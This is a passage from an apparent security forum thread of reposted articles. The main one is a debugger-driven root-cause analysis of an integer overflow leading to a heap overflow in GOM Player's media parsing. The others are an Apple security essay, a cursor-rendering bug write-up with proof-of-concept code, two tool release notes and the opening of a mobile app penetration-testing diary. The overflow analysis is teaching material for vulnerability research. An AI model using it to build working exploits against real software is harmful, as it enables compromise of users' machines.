execute the following command: gflags.exe /p /enable gom.exe Next, let’s go ahead and start our process under WinDbg. This time, we’ll only apply 1 breakpoint in order to halt execution upon execution of our first write instruction. 0:000> bp GSFU!DllUnregisterServer+0x236a9 ".printf \"The value, 0x%p, is taken from 0x%p and written to 0x%p\\n\", @edx, @esi, (@ecx+@eax*4)" Bp expression 'GSFU!DllUnregisterServer+0x236a9' could not be resolved, adding deferred bp 0:000> g The value, 0x000094b5, is taken from 0x06209c4c and written to 0x06209dc0 eax=00000000 ebx=000000ec ecx=06209dc0 edx=000094b5 esi=06209c4c edi=06209bb8 eip=06034989 esp=0012bdb4 ebp=06209c38 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202 GSFU!DllUnregisterServer+0x236a9: 06034989 891481 mov dword ptr [ecx+eax*4],edx ds:0023:06209dc0=00000000 0:000> !py mona info -a 0x06209dc0 Hold on... [+] Generating module info table, hang on... - Processing modules - Done. Let's rock 'n roll. [+] NtGlobalFlag: 0x02000000 0x02000000 : +hpa - Enable Page Heap [+] Information about address 0x06209dc0 {PAGE_READWRITE} Address is part of page 0x06200000 - 0x0620a000 This address resides in the heap Address 0x06209dc0 found in _HEAP @ 06200000, Segment @ 06200680 ( bytes ) (bytes) HEAP_ENTRY Size PrevSize Unused Flags UserPtr UserSize Remaining - state 06209d98 000000d8 00000050 00000014 [03] 06209dc0 000000a4 0000000c Extra present,Busy (hex) 00000216 00000080 00000020 00000164 00000012 Extra present,Busy (dec) Chunk header size: 0x8 (8) Extra header due to GFlags: 0x20 (32) bytes DPH_BLOCK_INFORMATION Header size: 0x20 (32) StartStamp : 0xabcdaaaa Heap : 0x86101000 RequestedSize : 0x0000009c ActualSize : 0x000000c4 TraceIndex : 0x0000193e StackTrace : 0x04e32364 EndStamp : 0xdcbaaaaa Size initial allocation request: 0xa4 (164) Total space for data: 0xb0 (176) Delta between initial size and total space for data: 0xc (12) Data : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ... [+] Disassembly: Instruction at 06209dc0 : ADD BYTE PTR [EAX],AL Output of !address 0x06209dc0: Usage: <unclassified> Allocation Base: 06200000 Base Address: 06200000 End Address: 0620a000 Region Size: 0000a000 Type: 00020000.MEM_PRIVATE State: 00001000.MEM_COMMIT Protect: 00000004.PAGE_READWRITE Good. So here we can see that we’re writing to an allocated heap chunk. The requested size of our block is 0x9C. Based on our access violation, we can already determine that the current state of our mutated file will attempt to write more than 0x9C bytes of data. After 0x9C bytes, our boundary is reached and an access violation is triggered. Considering the structure in which we’re writing our data, it appears as if we’ve identified a very simple example of a heap overflow. If we are able to control the length of the data being written and another heap chunk sits in a location following our written data, we may be able to write beyond the bounds of our chunk and corrupt the metadata (chunk header) of the following chunk, or application data stored in that adjacent chunk (that is of course with GFlags disabled). More on this later. However, before we attempt to do so, we still have not determined the actual cause of our exception. Why is it that we are allocating a region that is only 0x9C bytes, yet attempting to write significantly more? Our next step in the process will be to determine where our allocated size of 0x9C comes from. Is this some value specified in the file? There are in in fact several methods we could use to determine this. We could set a breakpoint on all heap allocations of size 0x9C. Once we’ve identified the appropriate allocation, we can then look into the calling function in order to determine where the size is derived. Fortunately for us, with GFlags enabled, that is unnecessary. As I mentioned earlier, when page heap verification is enabled, a field within the page heap header contains a pointer to the stack trace of our allocated block. A pointer to this stack trace is listed in !mona’s output under DPH_BLOCK_INFORMATION*** table (highlighted above). This allows us to see which functions were called just prior to our allocation. This information can also be obtained without !mona by using the !heap command while supplying an address within the heap chunk: !heap –p –a 0x06209dc0 You can also retrieve this information using the ‘dt’ command and the address of the chunk’s “StartStamp”. dt _DPH_BLOCK_INFORMATION 0x06209da0. With that said, let’s use the ‘dds’ command to display the stack trace of the allocated chunk. 0:000> dds 0x04e32364 04e32364 abcdaaaa 04e32368 00000001 04e3236c 00000004 04e32370 00000001 04e32374 0000009c 04e32378 06101000 04e3237c 04fbeef8 04e32380 04e32384 04e32384 7c94b244 ntdll!RtlAllocateHeapSlowly+0x44 04e32388 7c919c0c ntdll!RtlAllocateHeap+0xe64 04e3238c 0609c2af GSFU!DllGetClassObject+0x29f8f 04e32390 06034941 GSFU!DllUnregisterServer+0x23661 Here we can see two GOM functions (GSFU!DLLUnregisterServer and GSFU!DLLGetClassObject) are called prior to the allocation. First, let’s take a quick glance at the function just prior to our call to ntdll!RtlAllocateHeap using IDA Pro. So as we would expect, here we can see a call to HeapAlloc. The value being provided as dwBytes would be 0x9C (our requested size). It’s important to note here that IDA Pro, unlike WinDbg, has the ability to enumerate functions such as this. When it identifies a call to a known function, it will automatically apply comments in order to identify known variables supplied to that function. In the case of HeapAlloc (ntdll!RtlAllocateHeap), it will accept 3 arguments; dwBytes (size of the allocation), dwFlags, and hHeap (a pointer to the owning heap). More information on this function can be found at the MSDN page here. Now in order to identify where the value of dwBytes is introduced, let’s go ahead and take a quick look at the previous function (GSFU!DllUnregisterServer+0×23661) in our stack trace. Interesting. Here we can see that a call to the Calloc function is made, which in turn calls HeapAlloc. Before we continue, we need to have a short discussion about Calloc. Calloc is a function used to allocate a contiguous block of memory when parsing an array. It accepts two arguments: size_t num ; Number of Objects size_t size ; Size of Objects It will allocate a region of memory using a size derived by multiplying both arguments (Number of Objects * Size of Objects). Then, by calling memset it will zero initialize the array (not really important for the purpose of this article). What is important to note however, is that rather than using the CRT version of Calloc (msvcrt!calloc), an internal implementation is used. We can see this by following the call (the code is included in the GSFU module rather than making an external call to msvcrt)***. The importance of this will become clear very soon. You can easily follow any call in IDA Pro by simply clicking on the called function. In this case, clicking on “_calloc” will bring us to our inlined function. We can determine that the function has been inlined as GSFU.ax is our only loaded module. A jump to the msvcrt!calloc function would be displayed by an “extrn”, or external, data reference (DREF). Now, with a quick look at our two calling functions, let’s go ahead and set a one time breakpoint on the first value being supplied to Calloc so that once it is hit, another breakpoint is applied to ntdll!RtlAllocateHeap. Then, we’ll trace until ntdll!RtlAllocateHeap is hit. Let’s go ahead and apply the following breakpoint, and then tell the process to continue running (g) 0:000> bp GSFU!DllUnregisterServer+0x23653 /1 "bp ntdll!RtlAllocateHeap; ta" Bp expression 'GSFU!DllUnregisterServer+0x23653 /1' could not be resolved, adding deferred bp 0:000> g eax=050d9d70 ebx=000000f8 ecx=050d9d70 edx=80000027 esi=050d9c48 edi=050d9bb8 eip=06034934 esp=0012bdb0 ebp=050d9c38 iopl=0 nv up ei ng nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200286 GSFU!DllUnregisterServer+0x23653 06034933 52 push edx ; Number of Elements eax=050d9d70 ebx=000000f8 ecx=050d9d70 edx=80000027 esi=050d9c48 edi=050d9bb8 eip=06034934 esp=0012bdb0 ebp=050d9c38 iopl=0 nv up ei ng nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200286 GSFU!DllUnregisterServer+0x23654: 06034934 6a04 push 4 ; Size of Elements eax=050d9d70 ebx=000000f8 ecx=050d9d70 edx=80000027 esi=050d9c48 edi=050d9bb8 eip=06034936 esp=0012bdac ebp=050d9c38 iopl=0 nv up ei ng nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200286 GSFU!DllUnregisterServer+0x23656: 06034936 83c604 add esi,4 eax=050d9d70 ebx=000000f8 ecx=050d9d70 edx=80000027 esi=050d9c4c edi=050d9bb8 eip=06034939 esp=0012bdac ebp=050d9c38 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202 GSFU!DllUnregisterServer+0x23659: 06034939 83eb0c sub ebx,0Ch eax=050d9d70 ebx=000000ec ecx=050d9d70 edx=80000027 esi=050d9c4c edi=050d9bb8 eip=0603493c esp=0012bdac ebp=050d9c38 iopl=0 nv up ei pl nz ac po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200212 GSFU!DllUnregisterServer+0x2365c: 0603493c e8e6780600 call GSFU!DllGetClassObject+0x29f07 (0609c227) ; Calloc ...truncated... eax=0012bd94 ebx=000000ec ecx=050d9d70 edx=80000027 esi=00000004 edi=050d9bb8 eip=05d5c236 esp=0012bd78 ebp=0012bda4 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200206 GSFU!DllGetClassObject+0x29f16: 05d5c236 0faf750c imul esi,dword ptr [ebp+0Ch] ss:0023:0012bdb0=80000027 eax=0012bd94 ebx=000000ec ecx=050d9d70 edx=80000027 esi=0000009c edi=050d9bb8 eip=05d5c23a esp=0012bd78 ebp=0012bda4 iopl=0 ov up ei pl nz na pe cy cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200a07 GSFU!DllGetClassObject+0x29f1a: 05d5c23a 8975e0 mov dword ptr [ebp-20h],esi ss:0023:0012bd84=0012d690 ...truncated... eax=0012bd94 ebx=000000ec ecx=050d9d70 edx=80000027 esi=0000009c edi=00000000 eip=05d5c2a0 esp=0012bd78 ebp=0012bda4 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200246 GSFU!DllGetClassObject+0x29f80: 05d5c2a0 56 push esi ; Allocation Size eax=0012bd94 ebx=000000ec ecx=050d9d70 edx=80000027 esi=0000009c edi=00000000 eip=05d5c2a1 esp=0012bd74 ebp=0012bda4 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200246 GSFU!DllGetClassObject+0x29f81: 05d5c2a1 6a08 push 8 ; Flags eax=0012bd94 ebx=000000ec ecx=050d9d70 edx=80000027 esi=0000009c edi=00000000 eip=05d5c2a3 esp=0012bd70 ebp=0012bda4 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200246 GSFU!DllGetClassObject+0x29f83: 05d5c2a3 ff35a0cada05 push dword ptr [GSFU!DllGetClassObject+0x7a780 (05dacaa0)] ds:0023:05dacaa0=05dc0000 ; HeapHandle eax=0012bd94 ebx=000000ec ecx=050d9d70 edx=80000027 esi=0000009c edi=00000000 eip=05d5c2a9 esp=0012bd6c ebp=0012bda4 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200246 GSFU!DllGetClassObject+0x29f89: 05d5c2a9 ff15ece0d605 call dword ptr [GSFU!DllGetClassObject+0x3bdcc (05d6e0ec)] ds:0023:05d6e0ec={ntdll!RtlAllocateHeap (7c9100c4)} Breakpoint 1 hit eax=0012bd94 ebx=000000ec ecx=050d9d70 edx=80000027 esi=0000009c edi=00000000 eip=7c9100c4 esp=0012bd68 ebp=0012bda4 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200246 ntdll!RtlAllocateHeap: 7c9100c4 6804020000 push 204h When analyzing operations like this, I typically find it best to start from the bottom up. Since we already know that our requested allocation size is 0x9C, we can begin at the point where the value 0x9C is provided as the dwBytes argument for ntdll!RtlAllocateHeap (GSFU!DllGetClassObject+0x29f80). The next thing we need to do is look for the instruction, prior to our push instruction, that either introduces the value 0x9C to esi or modifies it. Looking back a few lines, we see this instruction: eax=0012bd94 ebx=000000ec ecx=050d9d70 edx=80000027 esi=00000004 edi=050d9bb8 eip=05d5c236 esp=0012bd78 ebp=0012bda4 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200206 GSFU!DllGetClassObject+0x29f16: 05d5c236 0faf750c imul esi,dword ptr [ebp+0Ch] ss:0023:0012bdb0=80000027 Interesting. It appears that we’re performing signed multiplication of the value contained in esi (0×4) and our “Number of Entries” element within the “stsz” atom (as pointed to by our stack entry located at 0x0012bdb0). This makes sense since Calloc, as we had previously discussed, will perform an allocation of data with a size of (Number of Elements * Size of Elements). However, there seems to be a problem with our math. When multiplying 0×80000027 * 0×4, our result should be 0x20000009C rather than 0x0000009C. The reason for this is that we’re attempting to store a value larger than what our 32 bit register can hold. When doing so, an integer overflow occurs and our result is “wrapped,” causing only the 32 least significant bits to be stored in our register. With this, we can control the size of our allocations by manipulating the value contained within our “Number of Entries” element. By allocating a chunk smaller than the data we intend to write, we can trigger a heap overflow. However, the root cause of our issue is not exactly as clear as it may seem. When we looked at our function in IDA Pro earlier, we determined that rather than using the CRT version of calloc (msvcrt!calloc), GOM used a wrapped version instead. Had the actual Calloc function been used, this vulnerability would not exist. To explain this, let’s take a look at the code snippet below: #include <stdio.h> #include <malloc.h> int main( void ) { int size = 0x4; // Size of Element int num = 0x80000027; // Number of Elements int *buffer; printf( "Attempting to allocate a buffer with size: 0x20000009C" ); buffer = (int *)calloc( size, num ); // Size of Element * Number of Elements if( buffer != NULL ) printf( "Allocated buffer with size (0x%X)\n", _msize(buffer) ); else printf( "Failed to allocate buffer.\n" ); free( buffer ); } The example above demonstrates a valid (albeit it, not the best) use of the Calloc. Here we’re trying to allocate an array with a size of 0x200000009C (0×4 * 0×80000027). Let’s see what would happen if we were to compile and run this code: Attempting to allocate a buffer with size: 0x4 * 0x200000009C Failed to allocate buffer. Interesting. Calloc will fail to allocate a buffer due to checks intended in detect wrapped values. Under Windows XP SP3, this functionality can be seen in the following 2 instructions. eax=ffffffe0 ebx=00000000 ecx=00000004 edx=00000000 esi=016ef79c edi=016ef6ee eip=77c2c0dd esp=0022ff1c ebp=0022ff48 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 msvcrt!calloc+0x1a: 77c2c0dd f7f1 div eax,ecx eax=3ffffff8 ebx=00000000 ecx=00000004 edx=00000000 esi=016ef79c edi=016ef6ee eip=77c2c0df esp=0022ff1c ebp=0022ff48 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 msvcrt!calloc+0x1c: 77c2c0df 3b450c cmp eax,dword ptr [ebp+0Ch] ss:0023:0022ff54=80000027 Here we can see that the (near) maximum value for a 32 bit register (0xFFFFFFE0) is divided by our first argument supplied to Calloc. The result is then compared against the second value supplied to calloc. If the second value is larger, Calloc is able to determine that an integer overflow will occur and exit. However, the _Calloc function found in the GSFU module, unlike msvcrt!calloc, does not contain this check. Take a look at the following example: #include <stdio.h> #include <malloc.h> int _calloc( size_t num, size_t size ) { size_t total = num * size; // Integer overflow occurs here return (total); } int main( void ) { int size = 4; // Size of Element int num = 0x80000017; // Number of Elements int *buffer; int chunk_size = _calloc( size, num ); printf ("Attempting to allocate a buffer with size: 0x%X\n", chunk_size); buffer = (int *)malloc(chunk_size); if( buffer != NULL ) printf( "Allocated buffer with size (0x%X)\n", _msize(buffer) ); else printf( "Failed to allocate buffer.\n" ); free( buffer ); } Here we can see that instead of using the actual calloc function, we’re multiplying our two values (“Element Size” and “Number of Elements”) and storing the result in a variable called “chunk_size”. That value is then supplied as the size argument to malloc. Using the values from our mutated seed, let’s take a look at our sample program’s output: Attempting to allocate a buffer with size: 0x9C Allocated buffer with size (0x9C) As we expected, the application readily accepts our wrapped value (0x9C) and provides this as the size argument being supplied to malloc. This in turn will cause our buffer to be undersized allowing our heap overflow to occur. ARTICOL COMPLET: https://www.corelan.be/index.php/2013/07/02/root-cause-analysis-integer-overflows/
  18. Apple's security strategy: make it invisible Rich Mogull @rmogull When I received an invitation to the keynote event at Apple’s Worldwide Developers Conference, my first reaction was, “Why?” I’m known as a security guy, which means my keynote invites are only when major security features are released. But as I watched the presentations, I began to understand why. Among the many new features in iOS and OS X that the company discussed, two security-related ones received extended attention: iCloud Keychain and Activation Lock. And as I thought about the demos of those and other new features in the days that followed, I came to realize something about the company’s approach to security that I hadn’t thought about before. The human factor Apple is famously focused on design and human experience as their top guiding principles. When it comes to security, that focus created a conundrum. Security is all about placing obstacles in the way of attackers, but (despite the claims of security vendors) those same obstacles can get in the way of users, too. For many years, Apple tended to choose good user experience at the expense of leaving users vulnerable to security risks. Take passwords, for example: As essential as they are to protecting us and our devices, they are one of the most universally despised things about using technology. (I’ve ranted about passwords elsewhere). For many years, Apple tended to choose good user experience at the expense of leaving users vulnerable to security risks. That strategy worked for a long time, in part because Apple’s comparatively low market share made its products less attractive targets. But as Apple products began to gain in popularity, many of us in the security business wondered how Apple would adjust its security strategies to its new position in the spotlight. As it turns out, the company not only handled that change smoothly, it has embraced it. Despite a rocky start, Apple now applies its impressive design sensibilities to security, playing the game its own way and in the process changing our expectations for security and technology. Pragmatic design While Apple hasn’t said so explicitly, it’s clear that one key principle guides them when it comes to security: The more you impede a user’s ability to do something, the more likely that user is to circumvent security measures. There were three good examples in the company’s WWDC keynote: iCloud Keychain iCloud Keychain: When Apple first announced iCloud Keychain, I was initially perplexed. Why add a password manager to the operating system and default browser when there are plenty of third-party applications that do this, and it isn’t among a feature users are screaming for? Then I realized that Apple was tackling a real-world security issue by trying to make that issue simply go away for the average user. Apple certainly can’t stop the onslaught of phishing attacks. But it can add a built-in, cloud-based password manager that both reduces security risks and improves the user experience. That addition enables users to use complex, site-specific passwords, and those passwords will—with no user effort—synchronize across all of their devices and be available whenever they’re needed (assuming those users use Apple products only, of course). With the deep browser integration demonstrated at WWDC, it appears users won’t have to manage plugins or even click extra buttons to decide when they need to use the tool; it seems to pop up exactly when they need it, making it easier to use a Keychain-created password than manually enter one. That’s applying human design principles to solve a security problem and improve the overall user experience. No extra software to install, No plugins to manage. No buttons to remember to click. iCloud Keychain might not be good enough for power users, but it will bring the power of password management to the masses. Activation Lock Activation Lock: The theft of iDevices is rampant throughout the world. While we might blame Apple for producing such desirable products, the company clearly doesn’t want people to have to hide their devices in fake Blackberry cases to use them in public without fear. Phone carriers could dramatically reduce theft by refusing to activate stolen phones (every cellular enabled device has a unique hardware ID), but so far they have been slow to act. Even if domestic carriers did create a registry, it’s unlikely all foreign carriers would and bad guys would simply ship phones overseas. Activation Lock takes that decision out of carriers’ hands and instead applies a global solution. Barring new hacking techniques, phones tied to iCloud accounts will be unusable once stolen. Users don’t really need to do anything other than possess a free iCloud account. There’s no carrier lock-in, registration, paperwork, or other obstacles to using it. The feature has the potential to reduce device theft at no additional cost to consumers. So, once again, Apple is tackling a real-world problem without sacrificing the user experience. (Only time will tell how effective it is). Gatekeeper and the Mac App Store—As I’ve written previously, Gatekeeper combines sandboxing, the Mac App Store, and code-signing to dramatically reduce the chance a user can be tricked into installing malware. This is based on the success of the extreme sandboxing and reliance on the App Store for iOS that has prevented widespread malware from ever appearing on the iOS platform. Again, Apple addressed the user side of the problem. It didn’t rely on deep security technologies that targets could be tricked into circumventing. Rather, by pushing users to rely on applications from the Mac App Store and by providing strong incentives (like easier updates and no additional cost per computer), the company reduced the need to manually download apps from different locations. Apple then added Gatekeeper so users wouldn’t accidentally install applications from untrusted sources. This approach attacks the economics of malware while minimally impacting the user experience. A large percentage of users never need to think about where their software comes from or worry about being tricked into installing something bad. Invisible and practical You’ll see evidence of this same approach elsewhere in the Apple ecosystem. With FileVault 2, Apple provided full disk encryption for users to protect lost laptops. But at the same time, the technology allows users to safely and freely recover their system if they accidentally lock themselves out (without giving the NSA a back door). XProtect provides invisible, basic antimalware protection to all Macs, without the intrusiveness or cost normally associated with antivirus tools. Java in the browser is automatically disabled unless a user explicitly needs it; this introduces a small hurdle, while again minimizing the biggest attack path against current Macs. iOS will soon strongly encrypt all app data, while continuing the tight app isolation that effectively eliminates most forms of attack. These tight controls might frustrate some advanced technology users, and certainly frustrate security vendors. These tight controls might frustrate some advanced technology users, and certainly frustrate security vendors. But they also provide a safe user experience that’s proven itself effective over the past five years. The consistent thread through all these advances is Apple attempting, wherever possible, to use security to improve the user experience and make common security problems simply go away. By focusing so much on design, Apple increases the odds users will adopt these technologies and, so, stay safer. Sursa: Apple's security strategy: make it invisible | Macworld
  19. [h=2]Changing the cursor shape in Windows proven difficult by NVIDIA (and AMD)[/h] If you work in the software engineering or information security field, you should be familiar with all sorts of software bugs – the functional and logical ones, those found during the development and internal testing along with those found and reported by a number of complaining users, those that manifest themselves in the form of occassional, minor glitches in your system’s logic and those that can lose your company 440 million US dollars in 30 minutes; not to mention bugs which can enable attackers to remotely execute arbitrary code on your computer without you even realizing it. While the latter type of issues is usually of most interest to security professionals and 0-day brokers (not all developers, though) and thus the primary subject of this blog, this post is about something else – the investigation of a non-security (and hardly functional) bug I originally suspected win32k.sys for, but eventually discovered it was a problem in the NVIDIA graphics card device drivers. Figure 1. My typical work window order, with vim present in the background. To give you some background, I am a passionate user of vim for Windows (gvim, specifically). When working with code, my usual set up for one of the monitors is a black-themed vim window set for full-screen, sometimes with other smaller windows on top when coding happens to be preempted with some other tasks. The configuration is illustrated in Figure 1 in a slightly smaller scale. A few weeks ago, I noticed that moving the mouse cursor from the vim window over the border of the foreground window (Process Explorer in the example) and inside it, the cursor would be occassionally rendered with colorful artifacts while changing the shape. Interestingly, these artifacts would only show up for a fraction of second and only during one in a hundred (loose estimate) hovers from vim to another window. Due to the fact that the condition was so rare, difficult to reproduce manually and hardly noticeable even when it occured, I simply ignored it at the time, swamped with work more important than some random pixels rendered for a few milliseconds once or twice a day. Once I eventually found some spare time last week, I decided to thoroughly investigate the issue and find out the root cause of this weird behavior. I was primarily motivated by the fact that colorful artifacts appearing on the display could indicate unintended memory being rendered by the system, with the potential of pixels representing uninitialized kernel memory (thus making it a peculiar type of information disclosure vulnerability). Both me and Gynvael have found similar issues in the handling of image file formats by popular web browsers in the past, so the perspective of disclosing random kernel bytes seemed tempting and not too far off. Furthermore, I knew it was a software problem rather than something specific to one hardware configuration, as I accidentally encountered the bug on three different Windows 7 and 8 machines I use for my daily work. Following a brief analysis, it turned out I was not able to reproduce the issue using any background window other than vim. While I started considering if this could be a bug in vim itself, I tested several more windows (moving the mouse manually for a minute or two) and finally found that the Notepad worked equally well in the role of a background. Not a vim bug, hurray! As both windows share the same cursor shape while in edit mode – the I-beam, I concluded the bug must have been specific to switching from this specific shape to some other one. Precisely, while hovering the mouse over two windows and a boundary, the cursor switches from I-beam () to a horizontal resize () and later to a normal arrow (). Relying on the assumption that the bug is a race condition (or least timing related, as the problem only manifested while performing rapid mouse movements), I wrote the following proof of concept code to reproduce the problem in a more reliable manner (full source code here): LRESULT CALLBACK WndProc(HWND hwnd, UINT msg, WPARAM wparam, LPARAM lparam) { CONST UINT kTimerId = 1337; CONST UINT kIterations = 100; static HCURSOR cursor[3]; switch(msg) { case WM_CREATE: // Load cursors. cursor[0] = LoadCursor(NULL, IDC_IBEAM); cursor[1] = LoadCursor(NULL, IDC_SIZEWE); cursor[2] = LoadCursor(NULL, IDC_ARROW); // Set up initial timer. SetTimer(hwnd, kTimerId, 1, NULL); break; case WM_TIMER: // Rapidly change cursors. for (UINT i = 0; i < kIterations; i++) { SetCursor(cursor[0]); SetCursor(cursor[1]); SetCursor(cursor[2]); } // Re-set timer. SetTimer(hwnd, kTimerId, 1, NULL); break; [...] Articol complet: http://j00ru.vexillium.org/?p=1980
  20. MAC Address Scanner [TABLE] [TR] [TD][TABLE=width: 100%] [TR] [TD=align: justify]MAC Address Scanner is the free desktop tool to remotely scan and find MAC Address of all systems on your local network.[/TD] [/TR] [/TABLE] [/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD=align: justify] It allows you to scan either a single host or range of hosts at a time. During the scan, it displays the current status for each host. After the completion, you can generate detailed scan report in HTML/XML/TEXT format. Note that you can find MAC address for all systems within your subnet only. For all others, you will see the MAC address of the Gateway or Router. Being GUI based tool makes it very easy to use for all level of users including beginners. It is fully portable and works on all platforms starting from Windows XP to Windows 8. [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD=class: page_subheader] Features [/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] Quickly find MAC address of all systems on the Network Scan single or multiple systems Ability to stop the scanning operation at any time Color based representation for successful and failed hosts Save the scan report to HTML/XML/TEXT file Free and easy to use tool with cool GUI interface Fully Portable and can be run on any Windows system Support for local Installation & Un-installation [/TD] [/TR] [TR] [TD] [/TD] [/TR] [/TABLE] [TABLE] [TR] [TD=class: page_subheader]Screenshots[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD]Screenshot 1: MAC Address Scanner scanning the hosts and showing the discovered MAC addresses in blue color. [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD=align: center] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD]Screenshot 2: HTML based MAC Address scan report generated by MACAddressScanner[/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD=align: center] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD=class: page_subheader] Release History[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] [TABLE=width: 90%, align: center] [TR] [TD=class: page_sub_subheader]Version 1.0 : 7th July 2013[/TD] [/TR] [TR] [TD]First public release of MAC Address Scanner[/TD] [/TR] [TR] [TD] [/TD] [/TR] [/TABLE] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD=class: page_subheader]Download [/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] [TABLE=width: 95%, align: center] [TR] [TD] FREE Download MAC Address Scanner v1.0 License : Freeware Platform : Windows XP, 2003, Vista, Windows 7, Windows 8 Download [/TD] [/TR] [/TABLE] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [/TABLE] Sursa: MAC Address Scanner : Desktop Tool to Find MAC address of Remote Computers on Local Network | www.SecurityXploded.com
  21. Arachni v0.4.3 has been released (Open Source Web Application Security Scanner Framework) From: Tasos Laskos <tasos.laskos () gmail com> Date: Sat, 06 Jul 2013 21:59:02 +0300 Hey folks, There's a new version of Arachni, an Open Source, modular and high-performance Web Application Security Scanner Framework written in Ruby. The change-log is quite sizeable but some bullet points follow. For the Framework (v0.4.3): * Stable multi-Instance scans, taking advantage of SMP/Grid architectures for higher efficiency and performance. * Automated Grid load-balancing. * Platform fingerprinting for tailor-made audits resulting in less bandwidth consumption, less server stress and smaller scan runtimes. For the Web User Interface (v0.4.1): * Support for PostgreSQL. * Support for importing data and configuration from the previous 0.4.2-0.4 packages. Packages: * Downgraded to require GLIBC >= 2.12 for improved portability. For more details about the new release please visit: Version 0.4.3 is out - Arachni - Web Application Security Scanner Framework Download page: Download - Arachni - Web Application Security Scanner Framework Homepage - Home - Arachni - Web Application Security Scanner Framework Blog - Arachni - Web Application Security Scanner Framework - Web Application Security Scanner Framework Documentation - https://github.com/Arachni/arachni/wiki Support - Welcome - Arachni Support GitHub page - http://github.com/Arachni/arachni Code Documentation - Documentation for Arachni/arachni (master) Author - Tasos "Zapotek" Laskos (http://twitter.com/Zap0tek) Twitter - http://twitter.com/ArachniScanner Copyright - 2010-2013 Tasos Laskos License - Apache License v2 Cheers, Tasos Laskos. This list is sponsored by Cenzic -------------------------------------- Let Us Hack You. Before Hackers Do! It's Finally Here - The Cenzic Website HealthCheck. FREE. Request Yours Now! Application Security Testing Vulnerabilities | Cenzic Hailstorm Products -------------------------------------- Sursa: WebApp Sec: Arachni v0.4.3 has been released (Open Source Web Application Security Scanner Framework)
  22. [h=1]Mobile Application Hacking Diary Ep.1[/h] Mobile Application Hacking Diary Ep.1 |=--------------------------------------------------------------------=| |=------------=[ Mobile Application Hacking Diary Ep.1]=--------------=| |=--------------------------=[ 3 July 2013 ]=-------------------------=| |=----------------------=[ By CWH Underground ]=--------------------=| |=--------------------------------------------------------------------=| ###### Info ###### Title : Mobile Application Hacking Diary Ep.1 Author : ZeQ3uL and diF Team : CWH Underground Date : 2013-07-03 ########## Contents ########## [0x00] - Introduction [0x01] - Application Reconnaissance [0x01a] - Insecure Data Storage [0x01b] - Decompile Application Package [0x02] - Man in the Middle Attack [0x02a] - Preparation Tools [0x02b] - MitM Attack [0x03] - Server-Side Attack [0x03a] - Scanning [0x03b] - Gaining Access [0x03c] - Bypass Anti-Virus [0x03d] - PWNed System !! [0x03e] - It's Not Over !! [0x04] - Greetz To ####################### [0x00] - Introduction ####################### 000000000000000000000000000000000000000000000000 00000000000000 00000000000000000 000000000000000 During the past few years, we've seen mobile devices evolve from simple, 000000000000000 00000000000000 000000000000000 rather dumb phones to complete, integrated communication devices. 000000000000000 00000000000 0000000000000000 As these devices became more intelligent ("smart" phones) and data 0000000000000000 00000000000000000 transfer speeds on mobile networks increased significantly, people no longer 00000000000000 000000000000000 used them solely for making phone calls or sending text messages, but started 000000000000 000 000 0000000000000 using them for sending email, browsing the Internet, playing games, checking-in 00000000000 000 000 000000000000 for flights, or doing online banking transactions. 0000000000 00000000000 0000000000 00000000000 Companies started creating mobile applications to offer all sorts of services to their 000000000000000000000000000000000000000000000000 clients. Today, mobile applications are available for storing and synchronizing data 0000 00 00 0000 files in the cloud, participating in social network sites, or even playing with a talking 000 00 00 000 crazy frog. 000 00 00 000 000 00 00 000 As the data that is stored, processed, and transferred by these applications can often 000 00 00 000 be considered sensitive, it is important to ensure that the security controls on these mobile 0000 000 000 0000 devices and applications is effective. 0000000000 0000000000 000000000000000 000000 0000 00000000000 000000000000000 000000 00000 0000000000 --SANS Penetration Testing Blog 000000000000000 000000 000000 000000000 000000000000000000000000000000000000000000000000 This papers is the narrative and the explanation of our penetration testing techniques from the real world as a case study of an Android application testing (Android is a Linux-based platform developed by Google and the Open Handset Alliance. Application programming for it is done exclusively in Java. The Android operating system software stack consists of 